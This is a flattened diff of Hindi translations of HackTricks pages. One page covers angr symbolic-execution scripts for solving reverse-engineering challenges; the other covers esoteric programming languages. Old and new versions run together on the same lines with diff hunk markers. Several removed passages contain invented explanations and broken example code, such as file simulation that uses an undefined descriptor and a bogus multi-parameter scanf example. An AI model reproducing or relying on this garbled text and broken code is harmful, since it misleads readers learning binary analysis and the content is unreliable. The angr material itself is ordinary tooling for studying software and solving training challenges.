<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
{% hint style="info" %} {% hint style="info" %}
यदि प्रोग्राम **`scanf`** का उपयोग करके **stdin से एक साथ कई मान** प्राप्त कर रहा है, तो आपको एक स्थिति उत्पन्न करनी होगी जो **`scanf`** के बाद से शुरू होती है अगर प्रोग्राम **`scanf`** का उपयोग कर रहा है **stdin से एक साथ कई मान प्राप्त करने** के लिए, तो आपको एक स्थिति उत्पन्न करनी होगी जो **`scanf`** के बाद शुरू हो।
{% endhint %} {% endhint %}
### पते तक पहुंचने के लिए इनपुट (पता देते हुए पता देते हुए) ### पता पहुंचने के लिए इनपुट (पता देने वाले पते को दर्शाते हुए)
```python ```python
import angr import angr
import sys import sys
@ -84,11 +84,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### रजिस्ट्री मान्यताएं ### रजिस्ट्री मान्यताएँ
Registry values are key-value pairs stored in the Windows registry. They are used to store configuration settings and other important information for the operating system and installed applications. In the Windows registry, values are stored under specific keys, and each value has a unique name and data type.
रजिस्ट्री मान्यताएं विंडोज रजिस्ट्री में संग्रहीत की-मान्यता जोड़ी होती हैं। इन्हें ऑपरेटिंग सिस्टम और स्थापित एप्लिकेशन्स के लिए कॉन्फ़िगरेशन सेटिंग्स और अन्य महत्वपूर्ण जानकारी संग्रहीत करने के लिए उपयोग किया जाता है। विंडोज रजिस्ट्री में, मान्यताएं विशेष कुंजी के तहत संग्रहीत होती हैं, और प्रत्येक मान्यता का एक अद्वितीय नाम और डेटा प्रकार होता है।
```python ```python
# Angr doesn't currently support reading multiple things with scanf (Ex: # Angr doesn't currently support reading multiple things with scanf (Ex:
# scanf("%u %u).) You will have to tell the simulation engine to begin the # scanf("%u %u).) You will have to tell the simulation engine to begin the
@ -152,11 +148,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### स्टैक मान ### स्टैक मानें
The stack is a data structure used in computer programming to store and manage variables and function calls. In reverse engineering, analyzing the stack values can provide valuable information about the program's execution flow and the values being manipulated.
स्टैक एक डेटा संरचना है जिसका उपयोग कंप्यूटर प्रोग्रामिंग में चर और फंक्शन कॉल को संग्रहीत और प्रबंधित करने के लिए किया जाता है। रिवर्स इंजीनियरिंग में, स्टैक मानों का विश्लेषण करने से प्रोग्राम के निष्पादन फ्लो और मानों के बारे में महत्वपूर्ण जानकारी प्राप्त की जा सकती है।
```python ```python
# Put bit vectors in th stack to find out the vallue that stack position need to # Put bit vectors in th stack to find out the vallue that stack position need to
# have to reach a rogram flow # have to reach a rogram flow
@ -218,11 +210,11 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
इस स्थिति में, इनपुट `scanf("%u %u")` के साथ लिया गया था और मान `"1 1"` दिया गया था, इसलिए स्टैक के मान **`0x00000001`** उपयोगकर्ता इनपुट से आते हैं। आप देख सकते हैं कि ये मान `$ebp - 8` में शुरू होते हैं। इसलिए, कोड में हमने **`$esp` से 8 बाइट कम कर दिए हैं (क्योंकि उस समय `$ebp` और `$esp`े एक ही मान थे)** और फिर हमने BVS को पुश किया है इस स्थिति में, इनपुट `scanf("%u %u")` के साथ लिया गया था और मान `"1 1"` दिया गया था, इसलिए स्टैक के मान **`0x00000001`** **उपयोगकर्ता इनपुट** से आते हैं। आप देख सकते हैं कि यह मान `$ebp - 8` में शुरू होता है। इसलिए, कोड में हमने **`$esp` से 8 बाइट कम किए (उस समय `$ebp` और `$esp`ा समान मान था)** और फिर हमने BVS को पुश किया।
![](<../../../.gitbook/assets/image (614).png>) ![](<../../../.gitbook/assets/image (614).png>)
### स्थिर मेमोरी मान (ग्लोबल वेरिएबल्स) ### स्थायी मेमोरी मान (ग्लोबल वेरिएबल्स)
```python ```python
import angr import angr
import claripy import claripy
@ -283,7 +275,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### डायनेमिक मेमोरी के मान (मैलोक) ### डायनामिक मेमोरी मान (मैलोक)
```python ```python
import angr import angr
import claripy import claripy
@ -343,32 +335,6 @@ if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### फ़ाइल सिमुलेशन ### फ़ाइल सिमुलेशन
एनजीआर के माध्यम से फ़ाइल सिमुलेशन करने के लिए, हमें एक फ़ाइल सिस्टम को लोड करने की आवश्यकता होती है। इसके लिए हम `angr.Project()` का उपयोग करते हैं और उसे फ़ाइल पथ के साथ आवंटित करते हैं। फ़ाइल सिमुलेशन के बाद, हम फ़ाइल सिस्टम के स्थिति को पढ़ सकते हैं और उसे संशोधित कर सकते हैं। इसके लिए हम `state.posix.files` का उपयोग करते हैं। इसके बाद, हम फ़ाइल सिस्टम को अपडेट करने के लिए `state.posix.files[fd].content` को सेट कर सकते हैं। फ़ाइल सिमुलेशन के बाद, हम फ़ाइल सिस्टम को बंद करने के लिए `state.posix.close(fd)` का उपयोग करते हैं।
यहां एक उदाहरण है:
```python
import angr
# फ़ाइल सिमुलेशन के लिए फ़ाइल सिस्टम लोड करें
proj = angr.Project("/path/to/file")
# फ़ाइल सिस्टम की स्थिति पढ़ें
state = proj.factory.entry_state()
file_state = state.posix.files[fd]
# फ़ाइल सिस्टम को संशोधित करें
file_state.content = b"New content"
# फ़ाइल सिस्टम को अपडेट करें
state.posix.files[fd] = file_state
# फ़ाइल सिस्टम बंद करें
state.posix.close(fd)
```
इस उदाहरण में, हम `angr.Project()` का उपयोग करके फ़ाइल सिस्टम को लोड करते हैं। फ़ाइल सिस्टम की स्थिति को पढ़ने के लिए हम `state.posix.files[fd]` का उपयोग करते हैं और उसे संशोधित करने के लिए हम `file_state.content` को सेट करते हैं। फ़ाइल सिस्टम को अपडेट करने के बाद, हम `state.posix.close(fd)` का उपयोग करके फ़ाइल सिस्टम को बंद करते हैं।
```python ```python
#In this challenge a password is read from a file and we want to simulate its content #In this challenge a password is read from a file and we want to simulate its content
@ -424,7 +390,7 @@ if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
{% hint style="info" %} {% hint style="info" %}
ध्यान दें कि संकेतात्मक फ़ाइल में निरंतर डेटा को संकेतात्मक डेटा के साथ मिलाकर भी शामिल किया जा सकता है: ध्यान दें कि प्रतीकात्मक फ़ाइल में स्थायी डेटा भी हो सकता है जो प्रतीकात्मक डेटा के साथ मिला हुआ हो।
```python ```python
# Hello world, my name is John. # Hello world, my name is John.
# ^ ^ # ^ ^
@ -447,11 +413,11 @@ main(sys.argv)
``` ```
{% endhint %} {% endhint %}
### नियंत्रण लागू करना ### बाधाएं लागू करना
{% hint style="info" %} {% hint style="info" %}
कभी-कभी साधारण मानवीय कार्य जैसे कि 16 अक्षरों की लंबाई के 2 शब्दों की तुलना करना (लूप के माध्यम से) अंग्र को बहुत कीमती होता है क्योंकि इसे शाखाएं बनानी होती हैं जो गणना करती हैं एक शाखा प्रति if: `2^16`\ कभी-कभी साधारण मानव क्रियाएं जैसे कि 16 अक्षरों की लंबाई के 2 शब्दों की तुलना करना (लूप), **अंग्र** को बहुत कीमत पर पड़ता है क्योंकि यह शाखाएं **गणना** करने की आवश्यकता होती है क्योंकि यह 1 शाखा प्रति यदि उत्पन्न करता है: `2^16`\
इसलिए, यह आसान होता है कि **angr को पिछले बिंदु पर पहुंचाएं** (जहां वास्तविक कठिनाई का हिस्सा पहले से ही किया गया था) और **उन नियंत्रणों को मैन्युअल रूप से सेट करें**। इसलिए, यह अधिक सरल है कि **अंग्र से पिछले बिंदु तक पहुंचें** (जहां वास्तव में कठिन हिस्सा पहले से ही किया गया था) और **उन बाधाओं को मैन्युअल रूप से सेट करें**।
{% endhint %} {% endhint %}
```python ```python
# After perform some complex poperations to the input the program checks # After perform some complex poperations to the input the program checks
@ -524,17 +490,17 @@ if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
{% hint style="danger" %} {% hint style="danger" %}
कुछ स्थितियों में आप **वेरिटेस्टिंग** को सक्रिय कर सकते हैं, जो समान स्थितियों को मिलाकर अनावश्यक शाखाओं को बचाने और समाधान ढूंढने में मदद करेगा: `simulation = project.factory.simgr(initial_state, veritesting=True)` कुछ स्थितियों में आप **veritesting** को सक्रिय कर सकते हैं, जो समान स्थितियों को मिलाएगा, बिना उपयोगहीन शाखाओं को बचाने और समाधान ढूंढने के लिए: `simulation = project.factory.simgr(initial_state, veritesting=True)`
{% endhint %} {% endhint %}
{% hint style="info" %} {% hint style="info" %}
इन स्थितियों में आप एंग्र को कुछ ऐसा दे सकते हैं जिसे यह आसानी से समझ सके इन स्थितियों में एक और चीज जो आप कर सकते हैं, वह है **फ़ंक्शन को हुक करना जिससे angr को कुछ ज्यादा समझने में सुविधा हो**
{% endhint %} {% endhint %}
### सिम्युलेशन प्रबंधक ### सिमुलेशन प्रबंधक
कुछ सिम्युलेशन प्रबंधक अन्यों से अधिक उपयोगी हो सकते हैं। पिछले उदाहरण में एक समस्या थी क्योंकि कई उपयोगी शाखाएं बनाई गईं थीं। यहां, **वेरिटेस्टिंग** तकनीक उन्हें मिलाएगी और समाधान ढूंढेगी।\ कुछ सिमुलेशन प्रबंधक अन्यों से अधिक उपयोगी हो सकते हैं। पिछले उदाहरण में एक समस्या थी क्योंकि कई उपयोगी शाखाएँ बनाई गई थीं। यहाँ, **veritesting** तकनीक उन्हें मिलाएगी और समाधान ढूंढेगी।\
इस सिम्युलेशन प्रबंधक को निम्नलिखित तरीके से सक्रिय किया जा सकता है: `simulation = project.factory.simgr(initial_state, veritesting=True)` यह सिमुलेशन प्रबंधक भी इस तरह सक्रिय किया जा सकता है: `simulation = project.factory.simgr(initial_state, veritesting=True)`
```python ```python
import angr import angr
import claripy import claripy
@ -572,9 +538,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### एक फंक्शन के एक कॉल को हुक करना/बाईपास करना ### फ़ंक्शन को एक कॉल को हुक करना/बाईपास करना
इस उदाहरण में, हम एक फंक्शन के एक कॉल को हुक करने या बाईपास करने के लिए एक तकनीक का उपयोग करेंगे।
```python ```python
# This level performs the following computations: # This level performs the following computations:
# #
@ -642,11 +606,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### फंक्शन को हुक करना / सिमप्रोसीजर ### फ़ंक्शन को हुक करना / सिमप्रोसीजर
फंक्शन को हुक करना एक तकनीक है जिसका उपयोग आप एक फंक्शन को बदलने या उसके व्यवहार को नियंत्रित करने के लिए कर सकते हैं। इसका उपयोग आपको एक फंक्शन के विशेष भाग को बदलने की अनुमति देता है, जैसे कि उसके पैरामीटर या रिटर्न मान को बदलना। इसके लिए, आपको फंक्शन को हुक करने के लिए उचित तकनीक का उपयोग करना होगा, जैसे कि एक सिमप्रोसीजर।
एक सिमप्रोसीजर एक विशेष प्रकार का हुक होता है जो आपको एक फंक्शन के व्यवहार को नियंत्रित करने की अनुमति देता है। इसका उपयोग आप एक फंक्शन के विशेष भाग को बदलने के लिए कर सकते हैं, जैसे कि उसके पैरामीटर या रिटर्न मान को बदलना। इसके लिए, आपको एक सिमप्रोसीजर को फंक्शन के साथ जोड़ने की आवश्यकता होगी, जिससे आप उसके व्यवहार को नियंत्रित कर सकें।
```python ```python
# Hook to the function called check_equals_WQNDNKKWAWOLXBAC # Hook to the function called check_equals_WQNDNKKWAWOLXBAC
@ -730,39 +690,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### कई पैरामीटर्स के साथ scanf को सिम्युलेट करें ### कई पैरामीटर के साथ scanf का अनुकरण
यदि आप किसी प्रोग्राम को रिवर्स इंजीनियर कर रहे हैं और आपको scanf के साथ कई पैरामीटर्स को सिम्युलेट करने की आवश्यकता होती है, तो आप निम्नलिखित तरीके का उपयोग कर सकते हैं:
```python
import angr
# प्रोग्राम को लोड करें
project = angr.Project("/path/to/program")
# इनपुट स्ट्रिंग के लिए सिम्युलेटर बनाएं
simgr = project.factory.simulation_manager()
# प्रोग्राम के रजिस्टर को सेट करें
simgr.active[0].regs.rdi = 0x12345678 # पहला पैरामीटर
simgr.active[0].regs.rsi = 0xabcdef01 # दूसरा पैरामीटर
simgr.active[0].regs.rdx = 0x98765432 # तीसरा पैरामीटर
# प्रोग्राम को इंजेक्ट करें
simgr.explore(find=0xdeadbeef)
# इंजेक्शन के बाद प्रोग्राम की स्थिति देखें
if simgr.found:
solution_state = simgr.found[0]
print("पाया गया समाधान:")
print(solution_state.posix.dumps(0)) # प्रथम पैरामीटर
print(solution_state.posix.dumps(1)) # दूसरा पैरामीटर
print(solution_state.posix.dumps(2)) # तीसरा पैरामीटर
```
इस उदाहरण में, हम `angr` लाइब्रेरी का उपयोग करके प्रोग्राम को लोड करते हैं और एक सिम्युलेशन मैनेजर बनाते हैं। फिर हम प्रोग्राम के रजिस्टर को सेट करते हैं जिसमें हम वांछित पैरामीटर्स को सेट करते हैं। अंत में, हम प्रोग्राम को इंजेक्ट करते हैं और इंजेक्शन के बाद प्रोग्राम की स्थिति देखते हैं। यदि समाधान मिलता है, तो हम प्राप्त समाधान को प्रिंट करते हैं।
ध्यान दें कि यह उदाहरण एक आंकड़ा तक प्रोग्राम को सिम्युलेट करने के लिए है और यह वास्तविक प्रोग्राम को नहीं चला सकता है। आपको अपने वास्तविक प्रोग्राम के लिए उपयुक्त रजिस्टर और पैरामीटर्स को सेट करने की आवश्यकता होगी।
```python ```python
# This time, the solution involves simply replacing scanf with our own version, # This time, the solution involves simply replacing scanf with our own version,
# since Angr does not support requesting multiple parameters with scanf. # since Angr does not support requesting multiple parameters with scanf.
@ -824,9 +752,7 @@ raise Exception('Could not find the solution')
if __name__ == '__main__': if __name__ == '__main__':
main(sys.argv) main(sys.argv)
``` ```
### स्थिर बाइनरी ### स्थैतिक बाइनरी
एक स्थिर बाइनरी एक प्रोग्राम होता है जो बाइनरी फ़ाइल के रूप में संग्रहीत होता है और इसे बिना किसी अन्य संगठनिक या वायरगत आवश्यकता के चलाया जा सकता है। यह अर्थ है कि इसे किसी भी ऑपरेटिंग सिस्टम पर चलाया जा सकता है, और इसके लिए किसी भी अतिरिक्त सॉफ़्टवेयर की आवश्यकता नहीं होती है। यह एक उपयोगी गुण होता है क्योंकि इसे आप अन्य सिस्टमों पर आसानी से वितरित कर सकते हैं और इसे अनुकूलित करने के लिए किसी भी अतिरिक्त सॉफ़्टवेयर की आवश्यकता नहीं होती है।
```python ```python
# This challenge is the exact same as the first challenge, except that it was # This challenge is the exact same as the first challenge, except that it was
# compiled as a static binary. Normally, Angr automatically replaces standard # compiled as a static binary. Normally, Angr automatically replaces standard
@ -897,10 +823,10 @@ main(sys.argv)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **फॉलो** करें या **Twitter** पर [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details> </details>

View file

@ -1,35 +1,33 @@
# गूढ़ भाषाएँ # एसोटेरिक भाषाएँ
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी क हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी क हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
## [इसोलैंग विकि](https://esolangs.org/wiki/Main\_Page) ## [एसोलैंग्स विकि](https://esolangs.org/wiki/Main\_Page)
अधिक गूढ़ भाषाओं की खोज करने के लिए इस विकि की जांच करें अधिक एसोटेरिक भाषाओं की खोज करने के लिए उस विकि की जांच करें
## Malbolge ## Malbolge
``` ```
('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}=<M:9wv6WsU2T|nm-,jcL(I&%$#" ('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}=<M:9wv6WsU2T|nm-,jcL(I&%$#"
`CB]V?Tx<uVtT`Rpo3NlF.Jh++FdbCBA@?]!~|4XzyTT43Qsqq(Lnmkj"Fhg${z@> `CB]V?Tx<uVtT`Rpo3NlF.Jh++FdbCBA@?]!~|4XzyTT43Qsqq(Lnmkj"Fhg${z@>
``` ```
[http://malbolge.doleczek.pl/](http://malbolge.doleczek.pl)
## npiet ## npiet
![](<../.gitbook/assets/image (146).png>) ![](<../.gitbook/assets/image (146).png>)
[https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php) [https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
## रॉकस्टार ## Rockstar
``` ```
Midnight takes your heart and your soul Midnight takes your heart and your soul
While your heart is as high as your soul While your heart is as high as your soul
@ -58,9 +56,9 @@ Take it to the top
Whisper my world Whisper my world
``` ```
{% embed url="https://codewithrockstar.com/" %} ## पेटू
## पेटूह {% embed url="https://codewithrockstar.com/" %}
``` ```
KoKoKoKoKoKoKoKoKoKo Kud-Kudah KoKoKoKoKoKoKoKoKoKo Kud-Kudah
KoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah KoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah
@ -74,10 +72,10 @@ Kukarek
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
